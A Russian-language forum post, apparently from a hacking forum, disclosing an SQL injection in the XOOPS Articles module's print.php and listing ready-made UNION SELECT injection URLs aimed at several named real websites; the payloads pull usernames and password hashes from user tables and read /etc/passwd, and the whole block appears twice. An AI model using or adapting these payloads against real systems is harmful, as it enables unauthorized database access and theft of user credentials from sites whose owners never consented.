ice1k
02.03.2007, 21:02
Сейчас вот нарыл в Xoops'e одну вещь... Нигде в багтраках не видел этой уязвимости...
Программа: Xoops(пока что х3 до какой версии + должен присутствовать модуль - Articles)
Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения.
Уязвимость существует из-за недостаточной обработки входных данных в параметре "id" в сценарии print.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения. Пример:
http://victim/modules/articles/print.php?id=-1{code}
URL производителя: www.xoops.org
Вот реальные примеры:
http://www.irc.by/modules/articles/print.php?id=-99+union+select+1,2,3,4,AES_DECRYPT(AES_ENCRYPT(un ame,0x71),0x71),AES_DECRYPT(AES_ENCRYPT(pass,0x71) ,0x71),7,8,9,10,11,12,13,14,15,16,17,18,19,20+from +xoops_users/*
http://www.xoops2.ru/modules/articles/print.php?id=-99+union+select+1,2,3,4,convert(user()+using+cp125 1),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+x oops2_users/*
http://www.xoops.pl/modules/articles/print.php?id=-99+union+select+1,2,3,4,user(),6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20+manga_users/*
http://www.dolbin.ru/modules/articles/print.php?id=-99+union+select+1,2,3,4,concat(uname,0x3a,pass),6, 7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+xoops_ users/*
http://www.titanic.com/modules/articles/print.php?id=-99+union+select+1,2,3,4,LOAD_FILE('/etc/passwd'),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+ from+mysql.user/*
(c)ice1k :: AltST
Программа: Xoops(пока что х3 до какой версии + должен присутствовать модуль - Articles)
Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения.
Уязвимость существует из-за недостаточной обработки входных данных в параметре "id" в сценарии print.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения. Пример:
http://victim/modules/articles/print.php?id=-1{code}
URL производителя: www.xoops.org
Вот реальные примеры:
http://www.irc.by/modules/articles/print.php?id=-99+union+select+1,2,3,4,AES_DECRYPT(AES_ENCRYPT(un ame,0x71),0x71),AES_DECRYPT(AES_ENCRYPT(pass,0x71) ,0x71),7,8,9,10,11,12,13,14,15,16,17,18,19,20+from +xoops_users/*
http://www.xoops2.ru/modules/articles/print.php?id=-99+union+select+1,2,3,4,convert(user()+using+cp125 1),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+x oops2_users/*
http://www.xoops.pl/modules/articles/print.php?id=-99+union+select+1,2,3,4,user(),6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20+manga_users/*
http://www.dolbin.ru/modules/articles/print.php?id=-99+union+select+1,2,3,4,concat(uname,0x3a,pass),6, 7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+xoops_ users/*
http://www.titanic.com/modules/articles/print.php?id=-99+union+select+1,2,3,4,LOAD_FILE('/etc/passwd'),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+ from+mysql.user/*
(c)ice1k :: AltST